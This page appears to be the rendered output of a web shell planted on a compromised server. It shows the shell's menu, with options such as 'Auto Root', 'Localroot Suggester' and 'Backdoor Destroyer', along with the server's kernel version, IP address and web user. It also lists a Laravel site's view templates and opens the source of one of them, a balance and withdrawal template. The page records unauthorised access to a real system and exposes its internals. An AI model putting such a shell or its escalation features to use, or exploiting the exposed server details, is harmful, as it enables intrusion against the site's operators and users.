Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.22.98.193
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp /
resources /
views /
Delete
Unzip
Name
Size
Permission
Date
Action
auth
[ DIR ]
drwxr-xr-x
2018-12-04 21:08
chat
[ DIR ]
drwxrwxr-x
2021-02-22 07:46
layouts
[ DIR ]
drwxr-xr-x
2022-08-09 15:10
ajax-impact-update-range.blade.php
1.37
KB
-rw-r--r--
2021-05-01 11:04
ajax-impact-update.blade.php
1.19
KB
-rw-r--r--
2021-05-01 15:29
ajax-impact.blade.php
2.35
KB
-rw-rw-r--
2022-02-03 20:03
ajax-withdraw-update.blade.php
1.55
KB
-rw-r--r--
2021-05-01 15:34
ajax-withdraw.blade.php
803
B
-rw-r--r--
2021-04-30 09:49
balance.blade.php
223
B
-rw-r--r--
2022-09-21 19:18
candy.blade.php
4.56
KB
-rw-r--r--
2023-05-03 16:57
chat-bonuses-my.blade.php
9.52
KB
-rw-r--r--
2022-02-18 10:50
chat-bonuses.blade.php
6.3
KB
-rw-r--r--
2022-02-18 10:50
chat-home.blade.php
9.06
KB
-rw-r--r--
2021-06-02 11:09
chat-peoples-list.blade.php
1.32
KB
-rw-r--r--
2021-05-10 12:21
chat-unpip-my.blade.php
11.73
KB
-rw-r--r--
2021-06-27 04:17
chat-unpip.blade.php
10.15
KB
-rw-r--r--
2022-03-18 15:29
chat.blade.php
17.37
KB
-rw-r--r--
2022-03-27 16:53
countries.blade.php
2.16
KB
-rw-r--r--
2021-06-01 07:36
home.blade.php
64
B
-rw-r--r--
2021-02-23 11:53
login.blade.php
2.71
KB
-rw-r--r--
2022-02-18 08:29
profile-cookie.blade.php
1.4
KB
-rw-r--r--
2021-05-10 05:05
profile-data-agreement.blade.php
1.41
KB
-rw-r--r--
2021-05-10 05:05
profile-eula.blade.php
1.39
KB
-rw-r--r--
2021-05-10 05:05
profile-help.blade.php
21.38
KB
-rw-r--r--
2022-03-18 15:46
profile-index.blade.php
1.98
KB
-rw-r--r--
2021-05-28 12:47
profile-privacy.blade.php
1.44
KB
-rw-r--r--
2021-05-10 05:06
profile-terms.blade.php
1.44
KB
-rw-r--r--
2021-05-10 05:07
profile-user.blade.php
5.11
KB
-rw-r--r--
2021-05-06 15:23
profile.blade.php
6.1
KB
-rw-r--r--
2022-02-18 08:39
register.blade.php
3.51
KB
-rw-r--r--
2022-02-18 08:29
reset-password.blade.php
1.7
KB
-rw-r--r--
2021-03-17 09:16
search-results.blade.php
1.98
KB
-rw-r--r--
2021-05-30 10:44
unpip.blade.php
4.59
KB
-rw-r--r--
2021-06-07 06:50
Save
Rename
<? if (\Auth::check()) {?> <div class="switch-block"> <span>Money</span> <? if (intval($user_id) == intval(auth()->user()->id) AND \Auth::check()) {?> <div class="switch-block_switch custom-control custom-switch"> <input type="checkbox" <? if (auth()->user()->balance_public) {?>checked="checked"<?}?> class="custom-control-input" id="balance-public"> <label class="custom-control-label" for="balance-public"></label> </div> <?}?> </div> <div class="card-wrap moneys-block"> <div class="coins-block_icon"><img src="/img/Dashboard/USD.svg" alt=""></div> <div class="coins-block_number"><? if ($balance>0 AND (0.01 * (int)($balance*100))==0 ) echo '0.00'; else echo 0.01 * (int)($balance*100);?><? if ($balance>0) {?><span><? if (round((($balance - 0.01 * (int)($balance*100))*10000),0)<10) echo '0'.round((($balance - 0.01 * (int)($balance*100))*10000),0); else echo round((($balance - 0.01 * (int)($balance*100))*10000),0);?></span><?}?></div> <div class="coins-block_short-text">Balance</div> <div class="coins-block_short-button"><? if ($balance>=0 AND auth()->user()->card AND $user_id==\Auth::user()->id) {?><a href="javascript:void(0)" id="withdraw">Withdraw</a><?}else{?><a href="javascript:void(0)" class="inactive">Withdraw</a><?}?></div> <div class="coins-block_number-blended"><?=number_format($balance_all, 2, '.', '')?></div> <div class="coins-block_short-text">Withdrawals</div> </div> <div class="coins-block_card-footer"> <?=number_format($balance_total, 2, '.', ' ')?> <span>Total Withdrawals</span> </div> <?}?>